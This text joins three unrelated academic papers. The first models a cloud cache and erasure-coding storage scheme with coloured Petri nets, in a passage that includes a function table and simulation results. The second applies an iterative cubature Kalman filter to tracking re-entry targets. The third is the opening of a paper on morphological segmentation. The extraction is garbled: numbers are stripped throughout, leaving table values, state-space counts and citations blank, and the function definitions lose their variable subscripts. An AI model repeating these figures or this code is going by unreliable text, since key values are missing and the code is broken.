return length of a list fun cachemember(req:request,[])=false | cachemember(req,(n,d, k)::t)=if(# (req))=n then true else cachemember(req,t); check either a file exist in cache or not fun store(req:request,cl:cachelist) = ifcachemember (req,cl) then cl else (# (req),# (req),# (req))::cl; store a file on cache fun member (k ,[]) = false | member (k ,(k ,v ,k )::t) =if k =k then true else member (k ,t); check either a token exist in a list or not fun member ((k,n,d),[])=false| member ((k,n,d),(k ,n ,d )::t)=if k=k andalso n=n andalso d=d then true else member ((k,n,d),t); check either a token exist in a list or not fun remdup((k,n,d),sd)= if member ((k,n,d),sd) then sd else (k,n,d)::sd; remove duplications fun insert((k,n,d),[])=[(k,n,d)] | insert((k,n,d),(k ,n ,d )::t)=if n<=n then (k,n,d)::(k ,n ,d )::t else (k ,n ,d )::insert((k,n,d),t); insert in a list fun insert ((n,d,k),[])=[(n,d,k)] | insert ((n,d,k),(n ,d ,k )::t)=if k<=k then (n,d,k)::(n ,d ,k )::t else (n ,d ,k )::insert ((n,d,k),t); insert in a list fun insert ((k,n,d),[])=[(k,n,d)] | insert ((k,n,d),(k ,n ,d )::t)=if n<n then (k,n,d)::(k ,n ,d )::t else (k ,n ,d )::insert ((k,n,d),t); insert in a list fun sort[] = [] | 
sort ( (n,d,k)::t)= insert ((n,d,k),sort t); sort with respect to least frequently used fun sort []=[] | sort ((k,n,d)::t) = insert ((k,n,d),sort t); sort with respect to least frequently used fun member (k ,[])=false | member (k ,(k,k ,v )::t)= if k =k then true else member (k ,t); check either a token exist in a list or not fun recdata(k,n ,d,rd)=if member (n ,rd) then rd else insert((k,n , d),rd); reconstruct data fun checkdb(k,[])=false | checkdb(k,data(k ,k ,v)::t) = if k=k then true else checkdb(k,t); check data in data base fun recd (k,data(k ,k ,v)::t,rd,recdata)=if k=k then recdata(k ,k , v,rd) else recd (k,t,rd,recdata); enable transition if data is regenerated fun found(k,pak,rd,recd )=if checkdb(k,pak) then recd (k,pak,rd, recdata) else rd; enable transition if data is found in data base fun notfound(k,pak)=if checkdb(k,pak) then empty else `k; enable transition if data is not found in data base fun retrieve(k ,[]) = "not found" | retrieve (k ,(k ,v ,k )::t) = if k =k then v else retrieve(k ,t); retrieve data from data base (continued) rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cache is not full but the cachelist has a record with the same key, then token will be sent to place “already exist in cache” by firing the transition “send to cache”. store in db module figure shows the store in db module of the model. it has two places and one transition. one place is in-socket and one place is out-socket. whenever the cache is full, the data object with the least life is removed from the cache, and a token is added in the place “split & distribute”. this token enables the transition “split data”. then function split is table (continued). function purpose fun cachehit(member,retrieve,k,cl) = if member(k,cl) then `retrieve (k,cl) else empty; signal to show data is available in cache fun cachemis(member,k,cl)= if member(k,cl) then empty else `k; signal to show data is not available in cache fun sendtok(k ,k ,k ,k ) = if k ="write" then `(k ,k ,k ,k ) else `(k ,k ,k ,k ); enable either read or write transition fun updatelife(k,(k ,v ,k )::t) = if k=k then (k ,v ,k + ) ::t else updatelife(k,t); update frequency fun splitdata(n,d)= let val p = packetlength; fun splitdata (n,k,d) = let val d = string.size(d) in if d <=p then [(n,k,d)] else (n,k, substring (d, ,p )):: splitdata(n,k+ ,substring(d,p ,d -p )) end; in splitdata(n, ,d) end; split data fun split(k,data) = ( list.map(fn (n,n ,d)=>data(n,n ,d))(splitdata (k,data))); split data in n+k chunks figure cache module. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ called, which divides the data value into n data chunks. all the n chunks are sent to place “distribute” for distribution among n + k databases. db module this module is to retrieve the n data chunks from n + k data centers. db module contains three in-sockets and two out-sockets. figure illustrates the db module of the model. it has seven places and two transitions. three places are in-sockets, two places are out-sockets and one place is in-out-socket. whenever a token is reached in place “distribute”, it is stored in the database along with its unique key. whenever a token having a key is added in the place “cachemiss”, transition “getdata” will check the data chunks against that key. 
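Stepping back to the write path described above, the sketch below shows the store-in-cache decision, the least-frequently-used eviction when the cache is full, and the splitting of the evicted data object into fixed-size chunks that are spread over the data centres. The cache capacity, packet length, initial life value and round-robin placement are illustrative assumptions, not values taken from the model.

# Illustrative sketch of the write path: store in cache, evict the entry with the least
# life when the cache is full, split the evicted data into chunks of packet_length
# characters (the role of splitdata), and distribute the chunks over the databases.
PACKET_LENGTH = 3          # illustrative stand-in for packetlength
CACHE_CAPACITY = 4         # illustrative cache size

def split_data(key, data, packet_length=PACKET_LENGTH):
    """Cut data into numbered chunks of at most packet_length characters."""
    return [(key, i, data[start:start + packet_length])
            for i, start in enumerate(range(0, len(data), packet_length), start=1)]

def distribute(chunks, databases):
    """Send each chunk to a data centre; round-robin placement is an illustrative policy."""
    for i, chunk in enumerate(chunks):
        databases[i % len(databases)].append(chunk)

def store(key, data, cache_list, databases):
    """store_in_cache transition: insert if absent; if the cache is full, evict the least-life entry."""
    if any(k == key for k, _, _ in cache_list):
        return cache_list                                   # "already exist in cache"
    if len(cache_list) >= CACHE_CAPACITY:
        cache_list = sorted(cache_list, key=lambda e: e[2])  # sort by life (least frequently used first)
        evicted = cache_list.pop(0)                          # least-life object leaves the cache
        distribute(split_data(evicted[0], evicted[1]), databases)   # "split & distribute"
    return [(key, data, 1)] + cache_list                     # insert at the head of the cache list

dbs = [[], [], []]
cache = [(1, "colour", 5), (2, "petri", 2), (3, "nets", 1), (4, "cpn", 4)]
cache = store(5, "coloured", cache, dbs)
print(cache)
print(dbs)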
If the transition "getdata" finds chunks for that key, then the data chunk and its key are sent to the place "reconstruct data", which gets n data chunks from the n + k databases to regenerate the original data with a tolerance of k failures.

Regenerate data module
This module combines n data chunks to reconstruct the data in its original form. The regenerate-data module has nine places and four transitions; two places are in-out-sockets and four are out-sockets. In this module, when data needs to be reconstructed, the place "reconstruct_data" receives all data chunks against the search key from all available databases. The transition "recd" remains enabled until all data chunks have moved from the place "reconstruct_data". Then, on the arc between the transition "recd" and the place "rec", the function remdup (see the functions table) is called, and it removes all duplicate data chunks. After that, the function sort is called; it sorts the data chunks so that the data can be reconstructed. The place "reconstruct" holds the token with the data in its original form. This place sends the data to the place "reg data", which passes the data towards the substitution transition "receiver".

Figure: Store in DB module. Figure: DB module. Figure: Regenerate data module. Figure: Receiver module.

Receiver module
This module ensures that the data is ultimately transmitted to and received by the user. The receiver module has fifteen places and eleven transitions; two places are in-sockets and one is an out-socket. In this module, whenever a token arrives in the place "y" or "cachehit", it is sent towards the place "send queue". When a token from the place "send queue" enables the transition "send", there is a chance that the token is lost over the network. If the token is lost, the place "timer" receives the token, and that token is sent again to avoid a deadlock situation. If the token reaches place "c" and enables the transition "receiver", then the transition puts the data in the place "response". Further, the transition "transmitack" sends an acknowledgment towards the place "ack received", which on receiving the token enables the transition "remove", which removes that token from the place "sendqueue".

Simulation
Numerous simulation tools can be used to model and execute a system, such as Process Model, SocNetV and Network Workbench; however, the CPN formalism specifically supports simulation through CPN Tools. To check the behaviour of the proposed model, we ran several manual and ten fully automated simulations of the model with CPN Tools. One figure shows a partial simulation of the model through an intermediate marking (state). In order to obtain the average completion time of the total requests for both cached and non-cached data, ten simulations were performed (see the completion-time table). The table also shows which simulation gives the highest completion time for cached and non-cached data.
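As a rough analogue of the retry behaviour in the receiver module and of the repeated simulation runs just described, the sketch below replays a lossy send/acknowledge loop over several runs and averages the number of transmissions. The loss probability, the number of tokens and the run count are illustrative values, not figures from the paper.

# Illustrative sketch: a token leaves the send queue only after an acknowledgement; a lost
# transmission is resent when the timer fires, so delivery always completes eventually.
# Averaging over several runs mimics the repeated CPN simulations used for completion time.
import random

LOSS_PROBABILITY = 0.1          # illustrative; the model's loss figure is not legible in this copy

def attempts_to_deliver(rng):
    """Number of transmissions needed before the receiver acknowledges one token."""
    attempts = 1
    while rng.random() < LOSS_PROBABILITY:   # token lost -> timer fires -> retransmit
        attempts += 1
    return attempts

def run_simulation(num_tokens, rng):
    """Total transmissions needed to empty a send queue of num_tokens tokens."""
    return sum(attempts_to_deliver(rng) for _ in range(num_tokens))

rng = random.Random(7)
runs = [run_simulation(num_tokens=8, rng=rng) for _ in range(10)]   # ten simulation runs
print(runs, "average:", sum(runs) / len(runs))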
analysis to analyze the performance of the proposed model, we performed the following: verification of model state-space analysis of the proposed model is performed to monitor the proposed strategy's possible behavior and amend them accordingly (see table ). figure partial simulation of the module. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ performance analysis to evaluate the performance of the modeled strategy, average delay, throughput, and average queue lengths are collected by performing ten simulations of the model. for such purpose, monitors are applied on the transitions “check request”, “cache checked”, “split data”, “get data”, “reg data” and “receive” and places “cachehit”, “cachemis ”, “split”, “reconstruct data” and “response”. statistical analysis of output data is performed. standard behavioral properties and trace patterns generated by our model are analyzed by state space report. table illustrates the partial statistics generated by state space with s. it reveals that the occurrence graph (o-graph) has , nodes and , arcs. further, these statistics also depict the boundedness properties. the upper bound shows the maximum number of tokens in a place, while the lower bound shows the minimum number of tokens that can be added to a specific place. it shows that places table state space report of the model. statistics for o-graph state space state space nodes: arcs: secs: status: scc graph nodes: arcs: secs: boundedness properties best integer bounds upper lower cache ′ cache db ′ db main ′ check_cache main ′ request main ′ send_to_cache main ′ response network ′ next_receive network ′ next_send liveness properties dead markings [ , , , , : : : ] dead transition instances none live transition instances none fairness properties no infinite occurance sequences. rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cache, db , next_receive and next_send have both upper and lower bound , which means these places always have one token. however, the upper bound of the place “request” is , while it's lower bound is . further, place “response” has upper bound and lower bound equal to zero. it shows that at most requests from place “request” has been fulfilled and stored in place “response”. liveness properties disclose that there exist dead markings. dead markings are those markings that have no enabled binding elements. such dead markings are interpreted as final or terminal markings and not deadlock states of the modeled system. the state-space specifies that the model is partially correct and generated results are correct. therefore, the state-space analysis conveys that the modeled system behaves figure state space graph. full-size doi: . /peerj-cs. /fig- table completion time. completion time cached non cached simulation simulation simulation simulation simulation simulation simulation simulation simulation simulation rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ according to the requirements and the specifications. further, the model preserves the properties required for the utilization of storage resources. the full state space of cpn has , nodes and , arcs, which cannot be depicted in the reachability graph. therefore, fig. 
shows a graphical representation of state space from marking m –m by skipping some intermediate markings. in cpn tools, data collection monitors are applied to compute the average completion time. table depicts the average completion time of total requests to get both cached and non-cached data for ten simulations. figure also represents the completion time for each simulation performed. it shows that in each simulation, cached data takes less time than non-cached. therefore, it shows that the proposed approach improves storage resource utilization. further, it validates the precision of our approach. conclusion this research is about the issues of data storage and retrieval from cloud-based data centers. storage cost and bandwidth latency are the two major factors that influence the performance of a system. to reduce the bandwidth latency, most cloud service providers are using multiple copies of data, each on a separate data center across the world. moreover, data centers are expensive to build and also are unfriendly to the environment. erasure codes are the techniques that store data of n chunks in n + k data places. however, erasure codes need some extra computation time to regenerate the data. carom combined both techniques for dual benefits. this research formally modeled carom using cpn formalism. furthermore, we formally verified our model with space state analysis. moreover, we formally analyzed the performance of our model by performing several simulations using monitors in figure completion time. full-size doi: . /peerj-cs. /fig- rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cpn-tools. performance reports generated by cpn-tools show that the model outperforms the others. in the presented model, the cache size is fixed. the cache is replaced by using the least frequently used replacement algorithm. in the future, we will use some heuristic algorithms to resize and replace the cache in cloud-based systems. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � muhammad rizwan ali conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � farooq ahmad conceived and designed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � muhammad hasanain chaudary performed the computation work, prepared figures and/or tables, and approved the final draft. � zuhaib ashfaq khan conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � mohammed a. alqahtani performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. � jehad saad alqurni performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � zahid ullah performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � wasim ullah khan performed the experiments, prepared figures and/or tables, and approved the final draft. data availability the following information was supplied regarding data availability: raw data are available as a supplemental file. 
Supplemental information
Supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
International Conference on Sensor Network and Computer Engineering (ICSNCE)

Levenberg-Marquardt Method Based Iterative Square Root Cubature Kalman Filter and Its Applications to Maneuvering Re-entry Target Tracking

Mu Jing, School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China. E-mail: mujing @ .com
Wang Changyuan, School of Computer Science and Engineering, Xi'an Technological University, Xi'an, China. E-mail: cyw @ .com

Abstract—The Levenberg-Marquardt (abbreviated L-M) method based iterative square root cubature Kalman filter (abbreviated ISRCKFLM) inherits the numerical stability of the square root cubature Kalman filter and effectively suppresses the influence of a large initial estimation error and of the nonlinearity of the measurement equation on the state estimate, because it obtains the optimal state and variance estimates from the latest measurement through the L-M method. We apply the ISRCKFLM algorithm to the state estimation of maneuvering re-entry target tracking. The simulation results demonstrate that the ISRCKFLM algorithm has better state estimation accuracy compared with the unscented Kalman filter and the square root cubature Kalman filter, according to the estimation error analysis of the position, velocity, drag coefficient, turn coefficient and climbing force coefficient, and has a fast convergence rate.

Keywords—nonlinear filtering; square root cubature Kalman filter; Levenberg-Marquardt method; maneuvering re-entry target tracking

I. Introduction
The state estimation of a maneuvering re-entry target is a highly nonlinear filtering problem and has received much attention in the academic and engineering domains [ , ]. Up to now, the most commonly used nonlinear filter has been the extended Kalman filter (EKF) [ ]. The EKF is based on first-order Taylor approximations of the state transition and observation equations about the estimated state trajectory under a Gaussian assumption, so the EKF may introduce significant bias, or even convergence problems, due to the overly crude approximation [ ]. Especially for highly nonlinear problems such as the state estimation of a maneuvering re-entry target, the EKF may produce large filtering errors and even diverge. Based on the unscented transformation (UT), the unscented Kalman filter (UKF) uses a set of deterministic sampling points to approximate the posterior probability distribution of the system state; that is, the sigma points are used to capture the mean and variance information of the state [ ].
Recently, as a new way to solve the nonlinear estimation problem, the cubature-rule-based cubature Kalman filter (CKF) proposed in [ ] uses numerical multi-dimensional integration to approximate the recursive Bayesian estimation integrals under the Gaussian assumption. The CKF can solve high-dimensional nonlinear filtering problems with minimal computational effort. The square root cubature Kalman filter (SRCKF) was subsequently proposed in order to improve numerical stability [ ]. On the other hand, in order to decrease the effect of the initial estimation error and of the nonlinearity of the measurement equation, the Levenberg-Marquardt method based iterative square root cubature Kalman filter (ISRCKFLM) was developed on the basis of the SRCKF in [ ].

In this paper, we apply the ISRCKFLM algorithm to the state estimation of a maneuvering re-entry target. Simulations demonstrate that the ISRCKFLM algorithm can greatly improve the tracking accuracy of the maneuvering re-entry target and obtains fast convergence, compared with the UKF and SRCKF algorithms.

The rest of the paper is organized as follows. We begin with a description of the ISRCKFLM algorithm in Section II. Then we apply the ISRCKFLM algorithm to track a re-entry ballistic target (RBT) with unknown ballistic coefficient and discuss the simulation results in Section III. Finally, we draw conclusions in Section IV.

II. L-M Based Iterative Square Root Cubature Kalman Filter

Consider the following nonlinear dynamic system:

$\mathbf{x}_k = f(\mathbf{x}_{k-1}) + \mathbf{w}_{k-1}$
$\mathbf{z}_k = h(\mathbf{x}_k) + \mathbf{v}_k$

where $f$ and $h$ are known nonlinear functions; $\mathbf{x}_k \in \mathbb{R}^{n_x}$ and $\mathbf{z}_k \in \mathbb{R}^{n_z}$ are the state and measurement vectors, respectively; $\mathbf{w}_{k-1}$ and $\mathbf{v}_k$ are process and measurement Gaussian noise sequences with zero mean and covariances $\mathbf{Q}_{k-1}$ and $\mathbf{R}_k$, respectively; and $\{\mathbf{w}_{k-1}\}$ and $\{\mathbf{v}_k\}$ are mutually uncorrelated. Suppose that the state distribution at time $k-1$ is $\mathbf{x}_{k-1} \sim N(\hat{\mathbf{x}}_{k-1}, \mathbf{S}_{k-1}\mathbf{S}_{k-1}^{T})$. The Levenberg-Marquardt based iterative square root cubature Kalman filter (ISRCKFLM) is then described as follows.

A. Time update

1) Calculate the cubature points and propagate them through the state equation:

$\mathbf{X}_{i,k-1} = \mathbf{S}_{k-1}\,\xi_i + \hat{\mathbf{x}}_{k-1}$
$\mathbf{X}^{*}_{i,k} = f(\mathbf{X}_{i,k-1})$

where $\xi_i = \sqrt{m/2}\,[1]_i$, $i = 1,\dots,m$, $m = 2 n_x$, and $[1]_i$ is an $n_x$-dimensional vector generated in the way described in [ ].

2) Evaluate the predicted state and the square root of the predicted covariance:

$\hat{\mathbf{x}}_{k|k-1} = \frac{1}{m}\sum_{i=1}^{m}\mathbf{X}^{*}_{i,k}$
$\mathbf{S}_{k|k-1} = \mathrm{Tria}\big([\boldsymbol{\chi}^{*}_{k},\ \mathbf{S}_{Q,k-1}]\big)$

Here $\mathbf{S}_{Q,k-1}$ denotes a square-root factor of $\mathbf{Q}_{k-1}$, $\mathrm{Tria}(\cdot)$ denotes a general triangularization algorithm, and the matrix $\boldsymbol{\chi}^{*}_{k}$ is defined as

$\boldsymbol{\chi}^{*}_{k} = \frac{1}{\sqrt{m}}\,\big[\mathbf{X}^{*}_{1,k}-\hat{\mathbf{x}}_{k|k-1},\ \dots,\ \mathbf{X}^{*}_{m,k}-\hat{\mathbf{x}}_{k|k-1}\big]$

3) Evaluate the modified covariance:

$\tilde{\mathbf{P}}_{k|k-1} = \big[\mathbf{I} - \mathbf{S}_{k|k-1}\mathbf{S}_{k|k-1}^{T}\big(\mathbf{S}_{k|k-1}\mathbf{S}_{k|k-1}^{T} + \mu^{-1}\mathbf{I}\big)^{-1}\big]\,\mathbf{S}_{k|k-1}\mathbf{S}_{k|k-1}^{T}$

where $\mu$ is the adjusting (damping) parameter of the L-M method.
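A compact numerical sketch of the time update above is given below. It follows the standard square-root cubature prediction step: cubature points are generated from the square-root factor, propagated through f, and a square-root factor of the predicted covariance is recovered by triangularization. The dynamics function f, the dimensions and the use of a QR factorization for Tria are illustrative choices, not the authors' implementation.

# Illustrative sketch of the SRCKF time update: generate 2*n cubature points from the
# square-root factor, propagate them through f, and recover the predicted mean and a
# square-root factor of the predicted covariance via QR (playing the role of Tria).
import numpy as np

def time_update(x_hat, S, f, S_Q):
    n = x_hat.size
    m = 2 * n
    # cubature points: xi_i = sqrt(m/2) * (+/- e_i), i.e. sqrt(n) times the unit directions
    xi = np.sqrt(n) * np.hstack([np.eye(n), -np.eye(n)])           # n x m generator
    X = S @ xi + x_hat[:, None]                                    # cubature points
    X_prop = np.column_stack([f(X[:, i]) for i in range(m)])       # propagate through f
    x_pred = X_prop.mean(axis=1)                                   # predicted state
    chi = (X_prop - x_pred[:, None]) / np.sqrt(m)                  # centred, weighted deviations
    _, R = np.linalg.qr(np.hstack([chi, S_Q]).T)                   # Tria([chi, S_Q]) via QR
    return x_pred, R.T                                             # R.T is a square-root factor

f = lambda x: np.array([x[0] + 0.1 * x[1], 0.99 * x[1]])           # illustrative dynamics
x_hat = np.array([1.0, 0.5])
S = np.diag([0.1, 0.2])
S_Q = np.diag([0.01, 0.01])
print(time_update(x_hat, S, f, S_Q))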
B. Measurement update

1) Set the initial value as $\hat{\mathbf{x}}_k^{(0)} = \hat{\mathbf{x}}_{k|k-1}$.

2) Given the $i$-th iterate $\hat{\mathbf{x}}_k^{(i)}$, calculate the gain matrix

$\mathbf{L}_k^{(i)} = \tilde{\mathbf{P}}_{k|k-1}\,\mathbf{J}_h^{T}(\hat{\mathbf{x}}_k^{(i)})\,\big(\mathbf{J}_h(\hat{\mathbf{x}}_k^{(i)})\,\tilde{\mathbf{P}}_{k|k-1}\,\mathbf{J}_h^{T}(\hat{\mathbf{x}}_k^{(i)}) + \mathbf{R}_k\big)^{-1}$

where $\mathbf{J}_h$ denotes the Jacobian of the measurement function $h$.

3) Calculate the $(i+1)$-th iterate

$\hat{\mathbf{x}}_k^{(i+1)} = \hat{\mathbf{x}}_{k|k-1} + \mathbf{L}_k^{(i)}\big(\mathbf{z}_k - h(\hat{\mathbf{x}}_k^{(i)}) - \mathbf{J}_h(\hat{\mathbf{x}}_k^{(i)})(\hat{\mathbf{x}}_{k|k-1} - \hat{\mathbf{x}}_k^{(i)})\big) - \big(\mathbf{I} - \mathbf{L}_k^{(i)}\mathbf{J}_h(\hat{\mathbf{x}}_k^{(i)})\big)\,\mu\,\tilde{\mathbf{P}}_{k|k-1}\,(\hat{\mathbf{x}}_{k|k-1} - \hat{\mathbf{x}}_k^{(i)})$

4) Check the iteration termination condition $\lVert\hat{\mathbf{x}}_k^{(i+1)} - \hat{\mathbf{x}}_k^{(i)}\rVert \le \varepsilon$ or $i \ge N_{\max}$, where $\varepsilon$ and $N_{\max}$ are a predetermined threshold and the maximum number of iterations, respectively. If the termination condition is met, go to step 5); otherwise, set $\hat{\mathbf{x}}_k^{(i)} = \hat{\mathbf{x}}_k^{(i+1)}$ and return to step 2).

5) Take the state estimate at time $k$ as $\hat{\mathbf{x}}_k = \hat{\mathbf{x}}_k^{(N)}$.

6) Evaluate the cross-covariance and the square root of the innovation covariance at time $k$:

$\mathbf{P}_{xz,k} = \mathbf{S}_{k|k-1}\mathbf{S}_{k|k-1}^{T}\,\mathbf{J}_h^{T}(\hat{\mathbf{x}}_k^{(N)})$
$\mathbf{S}_{zz,k} = \mathrm{Tria}\big([\mathbf{J}_h(\hat{\mathbf{x}}_k^{(N)})\,\mathbf{S}_{k|k-1},\ \mathbf{S}_{R,k}]\big)$, with $\mathbf{S}_{R,k} = \mathrm{chol}(\mathbf{R}_k)$.

7) Calculate the filter gain and the square root of the covariance at time $k$:

$\mathbf{K}_k = \big(\mathbf{P}_{xz,k}/\mathbf{S}_{zz,k}^{T}\big)/\mathbf{S}_{zz,k}$
$\mathbf{S}_k = \mathrm{Tria}\big([\mathbf{S}_{k|k-1} - \mathbf{K}_k\,\mathbf{J}_h(\hat{\mathbf{x}}_k^{(N)})\,\mathbf{S}_{k|k-1},\ \mathbf{K}_k\,\mathbf{S}_{R,k}]\big)$

where the symbol "/" represents the matrix right-division operator.

III. Applications to Maneuvering Re-entry Target Tracking

In the simulation, the trajectory of the maneuvering re-entry target generated in [ ] is used, with the same parameters, initial state and covariance estimate. To compare the performance of the ISRCKFLM with the UKF and SRCKF algorithms, we obtain the root mean square errors (RMSEs) in the position, velocity, drag coefficient, turn coefficient and climb coefficient shown in the figures. All performance curves were obtained by averaging over independent Monte Carlo runs. Table I lists the accumulated root mean square errors (ARMSEs).

Figure: RMSE in position versus altitude (km) for UKF, SRCKF and ISRCKFLM.

From the position and velocity figures, we can see that the ISRCKFLM's RMSEs in position and velocity are lower than those of the UKF and SRCKF algorithms; in particular, the RMSEs of the ISRCKFLM algorithm are effectively suppressed, whereas those of the UKF and SRCKF algorithms show a big jump when the target performs a high maneuver.

Figure: RMSE in velocity. Figure: RMSE in drag coefficient. Figure: RMSE in turn coefficient.

As for the estimates of the drag coefficient, turn coefficient and climbing coefficient of the maneuvering re-entry target, the RMSEs of the three algorithms first decrease with altitude and reach their smallest values; the RMSEs then increase when a dive-and-turn maneuver occurs on the re-entry target, but the ISRCKFLM's RMSEs remain lower than those of the other two algorithms. The RMSEs of all filters gradually increase when the target experiences an increased climb force, with the ISRCKFLM's RMSE increasing slightly more slowly. After the maneuver is withdrawn, the RMSEs of the three algorithms begin to decline.

Figure: RMSE in climbing coefficient.

Table I.
armses in three filters algori- thms armsep /m armsev /ms - armsed/ kgm - armset /kgm - armsec /kgm - ukf . . . . . srckf . . . . . isrckf lm . . . . . moreover, the armses of the isrckflm in the positon, velocity, drag coefficient, turn coefficient and climbing coefficient are lower than those of ukf and srckf algorithms from table. . therefore, on the basis of the simulation results presented in figure. - , we can draw a conclusion that the isrckflm yields on the superior performance over the ukf and srckf on the state estimation of maneuvering re-entry target. iv. conclusion in this paper we apply the isrckflm algorithm to maneuvering re-entry target tracking. the latest measurement are fully used in the isrckflm algorithm, and innovation covariance and cross-covariance are improved in the iterative process, so we can obtain the optimal state estimation and covariance estimation. simulation results demonstrate that the performance of isrckflm algorithm is superior to ukf and ckf algorithms by analysis of errors in position, velocity, drag international conference on sensor network and computer engineering (icsnce ) coefficient, turn coefficient and climbing coefficient, and has the faster convergence rate. acknowledgment the authors would like to thank the support of fund of the state and local joint laboratory of advanced network and monitoring control engineering (no.gsysj ); natural science basic research program of department of science and technology of shaanxi province - youth foundation (no. jq ); the key project of department of education of shaanxi province (no. jf ). references [ ] li xr, jilkov vp. a survey of maneuvering target tracking - part ii: ballistic target models. signal and data processing of small targets, , : - . [ ] farina a, ristic b, benvenuti d. tracking a ballistic target: comparison of several nonlinear filters. ieee transactions on aerospace and electronic systems, , ( ): - . [ ] bar-shalom y, li xr, kirubarajan t. estimation with applications to tracking and navigation. new york: john wiley &son, inc, . [ ] athans m, wishner rp, bertolini a. suboptimal state estimation for continuous-time nonlinear system from discrete noisy measurements[j]. ieee transactions on automatic control, , ( ): - . [ ] julier sj, uhlmann jk. unscented filtering and nonlinear estimation. proceedings of the ieee, , ( ): - . [ ] arasaratnam i, haykin s. cubature kalman filters. ieee transactions on automatic control, , ( ): - . [ ] mu. j.; cai. y.; wang. c.y. l-m method based iteration cubature kalman filter and its applications, journal of xi’an technological university, , ( ): - . [ ] jing mu, yuanli cai, changyuan wang. state estimation of maneuvering reentry target using likelihood based iterated divided difference filter, journal of xi’an technological university, ( ): - , . . joint semantic synthesis and morphological analysis of the derived word ryan cotterell department of computer science johns hopkins university ryan.cotterell@jhu.edu hinrich schütze cis lmu munich inquiries@cislmu.org abstract much like sentences are composed of words, words themselves are composed of smaller units. for example, the english word questionably can be analyzed as question+able+ly. however, this structural decomposition of the word does not directly give us a semantic representation of the word’s meaning. since morphology obeys the principle of compositionality, the semantics of the word can be systematically derived from the meaning of its parts. 
in this work, we propose a novel probabilistic model of word formation that captures both the analysis of a word w into its constituent segments and the synthesis of the meaning of w from the mean- ings of those segments. our model jointly learns to segment words into morphemes and compose distributional semantic vectors of those morphemes. we experiment with the model on english celex data and german derivbase (zeller et al., ) data. we show that jointly modeling semantics increases both segmentation accuracy and morpheme f by between % and %. additionally, we investigate different models of vector compo- sition, showing that recurrent neural networks yield an improvement over simple additive models. finally, we study the degree to which the representations correspond to a linguist’s notion of morphological productivity. introduction in most languages, words decompose further into smaller units, termed morphemes. for example, the english word questionably can be analyzed as question+able+ly. this structural decomposition of the word, however, by itself is not a semantic rep- resentation of the word’s meaning; we further re- quire an account of how to synthesize the meaning from the decomposition. fortunately, words—just like phrases—to a large extent obey the principle of compositionality: the semantics of the word can be systematically derived from the meaning of its parts. in this work, we propose a novel joint prob- abilistic model of word formation that captures both structural decomposition of a word w into its con- stituent segments and the synthesis of w’s meaning from the meaning of those segments. morphological segmentation is a structured pre- diction task that seeks to break a word up into its constituent morphemes. the output segmentation has been shown to aid a diverse set of applications, such as automatic speech recognition (afify et al., ), keyword spotting (narasimhan et al., ), machine translation (clifton and sarkar, ) and parsing (seeker and çetinoğlu, ). in contrast to much of this prior work, we focus on supervised segmentation, i.e., we provide the model with gold segmentations during training time. instead of sur- there are many different linguistic and computational theo- ries for interpreting the structural decomposition of a word. for example, un- often signifies negation and its effect on semantics can then be modeled by theories based on logic. this work ad- dresses the question of structural decomposition and semantic synthesis in the general framework of distributional semantics. morphological research in theoretical and computational linguistics often focuses on noncompositional or less com- positional phenomena—simply because compositional deriva- tion poses fewer interesting research problems. it is also true that—just as many frequent multiword units are not completely compositional—many frequent derivations (e.g., refusal, fit- ness) are not completely compositional. an indication that non- lexicalized derivations are usually compositional is the fact that standard dictionaries like oup editors ( ) list derivational affixes with their compositional meaning, without a hedge that they can also occur as part of only partially compositional forms. see also haspelmath and sims ( ), § . . . transactions of the association for computational linguistics, vol. , pp. – , . action editor: regina barzilay. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. 
face segmentation, our model performs canonical segmentation (cotterell et al., a; cotterell et al., b; kann et al., ), i.e., it allows the induc- tion of orthographic changes together with the seg- mentation, which is not typical. for the example questionably, our model can restore the deleted char- acters le, yielding the canonical segments question, able and ly. in this work, our primary contribution lies in the integration of continuous semantic vec- tors into supervised morphological segmentation— we present a joint model of morphological analysis and semantic synthesis at the word-level. we experimentally investigate three novel aspects of our model. • first, we show that jointly modeling continu- ous representations of the semantics of mor- phemes and words allows us to improve mor- phological analysis. on the english portion of celex (baayen et al., ), we achieve a point improvement in segmentation accuracy and a point improvement in morpheme f . on the german derivbase dataset we achieve a point improvement in segmentation accu- racy and a point improvement in morpheme f . • second, we explore improved models of vec- tor composition for synthesizing word mean- ing. we find a recurrent neural network im- proves over previously proposed additive mod- els. moreover, we find that more syntactically oriented vectors (levy and goldberg, a) are better suited for morphology than bag-of- word (bow) models. • finally, we explore the productivity of english derivational affixes in the context of distribu- tional semantics. derivational morphology two important goals of morphology, the linguistic study of the internal structure of words, are to de- scribe the relation between different words in the lexicon and to decompose them into morphemes, the smallest linguistic unit bearing meaning. morphol- ogy can be divided into two types: inflectional and derivational. inflectional morphology is the set of processes through which the word form outwardly displays syntactic information, e.g., verb tense. it follows that an inflectional affix typically neither changes the part-of-speech (pos) nor the 